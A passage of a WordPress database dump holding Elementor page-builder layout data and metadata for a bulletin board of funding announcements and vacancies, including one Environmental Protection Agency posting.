openings.\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0a3f9d5\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"500791b\"}],\"structure\":\"30\",\"motion_fx_motion_fx_scrolling\":\"yes\",\"motion_fx_devices\":[\"desktop\"]},\"elements\":[{\"id\":\"bb6259c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":57.72399999999999664623828721232712268829345703125},\"elements\":[{\"id\":\"3ade5ef\",\"elType\":\"widget\",\"settings\":{\"title\":\"Announcements\\/Vacancies\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"087a2ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.28999999999999914734871708787977695465087890625},\"elements\":[{\"id\":\"4638ad1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Posted\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"c515565\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.010999999999999232613845379091799259185791015625},\"elements\":[{\"id\":\"ecf2102\",\"elType\":\"widget\",\"settings\":{\"title\":\"Closed\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29344,4136,'_elementor_pro_version','3.3.6'),(29346,4137,'_elementor_edit_mode','builder'),(29347,4137,'_elementor_template_type','wp-page'),(29348,4137,'_elementor_version','3.4.0'),(29349,4137,'_wp_page_template','default'),(29350,4137,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This bulletin provides a space for funding announcements, jobs, and other related openings.\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0a3f9d5\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"500791b\"}],\"structure\":\"30\",\"motion_fx_devices\":[\"desktop\"]},\"elements\":[{\"id\":\"bb6259c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":57.72399999999999664623828721232712268829345703125},\"elements\":[{\"id\":\"3ade5ef\",\"elType\":\"widget\",\"settings\":{\"title\":\"Announcements\\/Vacancies\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"087a2ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.28999999999999914734871708787977695465087890625},\"elements\":[{\"id\":\"4638ad1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Posted\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true},{\"id\":\"c515565\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.010999999999999232613845379091799259185791015625},\"elements\":[{\"id\":\"ecf2102\",\"elType\":\"widget\",\"settings\":{\"title\":\"Closed\",\"header_size\":\"h4\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_text_decoration\":\"underline\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10,\"custom_column_gap\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"pagination_type\":\"numbers_and_prev_next\",\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":75,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"4f69fff\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29352,4137,'_elementor_pro_version','3.3.6'),(29354,72,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:4;s:11:\"header_size\";i:4;s:5:\"align\";i:3;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:4;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:3;s:26:\"typography_text_decoration\";i:3;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:3:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}s:14:\"section_layout\";a:1:{s:16:\"content_position\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}s:8:\"advanced\";a:1:{s:15:\"section_effects\";a:1:{s:17:\"motion_fx_devices\";i:1;}}}}s:5:\"posts\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:3:{s:14:\"section_layout\";a:8:{s:5:\"_skin\";i:1;s:20:\"custom_template_list\";i:1;s:20:\"custom_skin_template\";i:1;s:18:\"custom_same_height\";i:1;s:14:\"custom_link_to\";i:1;s:14:\"custom_columns\";i:1;s:21:\"custom_posts_per_page\";i:1;s:15:\"custom_postlink\";i:1;}s:13:\"section_query\";a:1:{s:15:\"posts_post_type\";i:1;}s:18:\"section_pagination\";a:1:{s:15:\"pagination_type\";i:1;}}s:5:\"style\";a:2:{s:28:\"custom_section_design_layout\";a:2:{s:17:\"custom_column_gap\";i:1;s:14:\"custom_row_gap\";i:1;}s:24:\"section_pagination_style\";a:2:{s:18:\"pagination_spacing\";i:1;s:22:\"pagination_spacing_top\";i:1;}}}}}'),(29355,72,'_last_editor_used_jetpack','block-editor'),(29357,4138,'_elementor_edit_mode','builder'),(29358,4138,'_elementor_template_type','single-post'),(29359,4138,'_elementor_version','3.4.1'),(29360,4138,'_elementor_pro_version','3.3.6'),(29361,4138,'_edit_lock','1629391598:43'),(29362,4138,'_wp_page_template','default'),(29363,4138,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29364,4138,'_elementor_data','[{\"id\":\"f09d1c7\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b0a14f\"}]},\"elements\":[{\"id\":\"5eb3e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5f7c8ef\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0435d20\"}]},\"elements\":[{\"id\":\"7941856\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ba5ef7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"3dc1769\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c652bc2\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"2fbf64f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Posted: \",\"link\":\"\",\"show_icon\":\"none\"},{\"_id\":\"829b42e\",\"type\":\"custom\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"29051df\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%2C%22before%22%3A%22Closed%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"c661ccf\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"8259221\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aowner%22%2C%22before%22%3A%22Posted%20by%3A%20%22%7D\\\"]\"}}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29366,3790,'_wp_page_template','default'),(29367,3790,'owner','Environmental Protection Agency'),(29368,3790,'closed_date','2021-08-18'),(29369,3790,'link_to_website','https://www.epa.gov.lr/sites/default/files/CCCD%20ASSESSMENT%20PUBLIC%20AWARENESS%20OF%20RIO%20CONVENTIONS%20IMPLEMENTATIONS.pdf'),(29370,4143,'_elementor_edit_mode','builder'),(29371,4143,'_elementor_template_type','single-post'),(29372,4143,'_elementor_version','3.4.0'),(29373,4143,'_elementor_pro_version','3.3.6'),(29374,4143,'_wp_page_template','default'),(29375,4143,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29376,4143,'_elementor_data','[{\"id\":\"f09d1c7\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b0a14f\"}]},\"elements\":[{\"id\":\"5eb3e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5f7c8ef\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0435d20\"}]},\"elements\":[{\"id\":\"7941856\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ba5ef7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"3dc1769\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29379,4138,'_elementor_conditions','a:1:{i:0;s:30:\"include/singular/ekms_bulletin\";}'),(29380,4144,'_elementor_edit_mode','builder'),(29381,4144,'_elementor_template_type','single-post'),(29382,4144,'_elementor_version','3.4.0'),(29383,4144,'_elementor_pro_version','3.3.6'),(29384,4144,'_wp_page_template','default'),(29385,4144,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29386,4144,'_elementor_data','[{\"id\":\"f09d1c7\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b0a14f\"}]},\"elements\":[{\"id\":\"5eb3e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5f7c8ef\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0435d20\"}]},\"elements\":[{\"id\":\"7941856\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ba5ef7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"3dc1769\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c652bc2\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"2fbf64f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Posted: \",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"93c230f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"0549fef\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%2C%22before%22%3A%22Closed%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"c661ccf\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"8259221\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aowner%22%2C%22before%22%3A%22Posted%20by%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"_id\":\"f60d0d4\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"654ebdc\\\" name=\\\"pods-text\\\" settings=\\\"%7B%7D\\\"]\"}}],\"space_between\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29388,4144,'_elementor_conditions','a:1:{i:0;s:30:\"include/singular/ekms_bulletin\";}'),(29390,4145,'_elementor_edit_mode','builder'),(29391,4145,'_elementor_template_type','single-post'),(29392,4145,'_elementor_version','3.4.0'),(29393,4145,'_elementor_pro_version','3.3.6'),(29394,4145,'_wp_page_template','default'),(29395,4145,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29396,4145,'_elementor_data','[{\"id\":\"f09d1c7\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b0a14f\"}]},\"elements\":[{\"id\":\"5eb3e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5f7c8ef\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0435d20\"}]},\"elements\":[{\"id\":\"7941856\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ba5ef7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"3dc1769\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c652bc2\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"2fbf64f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Posted: \",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"93c230f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"0549fef\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%2C%22before%22%3A%22Closed%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"c661ccf\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"8259221\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aowner%22%2C%22before%22%3A%22Posted%20by%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"_id\":\"f60d0d4\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"654ebdc\\\" name=\\\"pods-text\\\" settings=\\\"%7B%7D\\\"]\"}}],\"space_between\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29398,4145,'_elementor_conditions','a:1:{i:0;s:30:\"include/singular/ekms_bulletin\";}'),(29400,4146,'_elementor_edit_mode','builder'),(29401,4146,'_elementor_template_type','single-post'),(29402,4146,'_elementor_version','3.4.0'),(29403,4146,'_elementor_pro_version','3.3.6'),(29404,4146,'_wp_page_template','default'),(29405,4146,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29406,4146,'_elementor_data','[{\"id\":\"f09d1c7\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b0a14f\"}]},\"elements\":[{\"id\":\"5eb3e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5f7c8ef\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0435d20\"}]},\"elements\":[{\"id\":\"7941856\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ba5ef7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"3dc1769\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c652bc2\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"2fbf64f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Posted: \",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"93c230f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"0549fef\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%2C%22before%22%3A%22Closed%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"c661ccf\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"8259221\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aowner%22%2C%22before%22%3A%22Posted%20by%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"_id\":\"f60d0d4\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"654ebdc\\\" name=\\\"pods-text\\\" 